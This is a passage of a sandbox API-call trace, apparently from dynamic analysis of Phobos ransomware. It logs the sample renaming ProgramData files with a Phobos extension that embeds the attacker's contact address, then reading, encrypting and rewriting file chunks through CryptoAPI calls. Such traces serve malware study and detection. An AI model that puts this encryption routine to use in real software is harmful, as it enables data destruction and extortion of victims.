hTemplateFile=0x0) returned 0x138 [0143.838] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=28865) returned 1 [0143.838] CloseHandle (hObject=0x138) returned 1 [0143.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png")) returned 0x20 [0143.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.838] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.838] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.838] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.839] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1334) returned 1 [0143.839] CloseHandle (hObject=0x138) returned 1 [0143.839] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml")) returned 0x20 [0143.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.840] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.840] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.840] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.840] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1334) returned 1 [0143.840] CloseHandle (hObject=0x138) returned 1 [0143.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml")) returned 0x20 [0143.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.841] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.841] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13427) returned 1 [0143.841] CloseHandle (hObject=0x138) returned 1 [0143.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml")) returned 0x20 [0143.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.841] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.842] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1512) returned 1 [0143.842] CloseHandle (hObject=0x138) returned 1 [0143.842] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml")) returned 0x20 [0143.842] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.842] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.842] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.842] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.842] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11364) returned 1 [0143.842] CloseHandle (hObject=0x138) returned 1 [0143.843] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml")) returned 0x20 [0143.843] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.843] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.843] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.843] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.843] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4194304) returned 1 [0143.843] CloseHandle (hObject=0x138) returned 1 [0143.843] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat")) returned 0x120 [0143.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0143.844] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.844] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0143.844] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0143.844] ReadFile (in: hFile=0x138, lpBuffer=0x3190058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3190058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0143.894] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x155555, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0143.895] ReadFile (in: hFile=0x138, lpBuffer=0x31d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x31d0058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0144.236] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x3c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0144.236] ReadFile (in: hFile=0x138, lpBuffer=0x3210058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3210058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0144.633] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fad4 | out: phKey=0x2a0fad4*=0xa327e8) returned 1 [0144.633] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0144.634] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0050) returned 1 [0144.640] CryptDestroyKey (hKey=0xa327e8) returned 1 [0144.640] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fab0 | out: lpNewFilePointer=0x0) returned 1 [0144.640] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2a0fac0, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac0*=0xc0102, lpOverlapped=0x0) returned 1 [0144.661] SetEndOfFile (hFile=0x138) returned 1 [0144.661] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x3c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0144.661] WriteFile (in: hFile=0x138, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0144.663] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x155555, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0144.663] WriteFile (in: hFile=0x138, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0144.665] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0144.665] WriteFile (in: hFile=0x138, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0144.666] CloseHandle (hObject=0x138) returned 1 [0145.386] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.386] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.386] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4627413) returned 1 [0145.386] CloseHandle (hObject=0x138) returned 1 [0145.387] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat")) returned 0x2020 [0145.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0145.387] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.387] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0145.387] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0145.387] ReadFile (in: hFile=0x138, lpBuffer=0x3190058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3190058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0145.419] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x178947, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0145.419] ReadFile (in: hFile=0x138, lpBuffer=0x31d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x31d0058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0145.438] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x429bd5, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x138, lpBuffer=0x3210058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3210058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0145.537] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fad4 | out: phKey=0x2a0fad4*=0xa32d68) returned 1 [0145.537] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0145.538] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0050) returned 1 [0145.544] CryptDestroyKey (hKey=0xa32d68) returned 1 [0145.544] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fab0 | out: lpNewFilePointer=0x0) returned 1 [0145.544] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2a0fac0, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac0*=0xc0102, lpOverlapped=0x0) returned 1 [0145.558] SetEndOfFile (hFile=0x138) returned 1 [0145.558] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x429bd5, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0145.558] WriteFile (in: hFile=0x138, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0145.560] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x178947, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0145.560] WriteFile (in: hFile=0x138, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0145.563] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0145.563] WriteFile (in: hFile=0x138, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0145.564] CloseHandle (hObject=0x138) returned 1 [0145.914] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.914] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.914] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=0) returned 1 [0145.914] CloseHandle (hObject=0x138) returned 1 [0145.914] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.914] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.915] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.915] CloseHandle (hObject=0x138) returned 1 [0145.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp")) returned 0x20 [0145.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.915] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.915] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.915] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.916] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.916] CloseHandle (hObject=0x138) returned 1 [0145.916] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp")) returned 0x20 [0145.916] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.916] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.916] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) 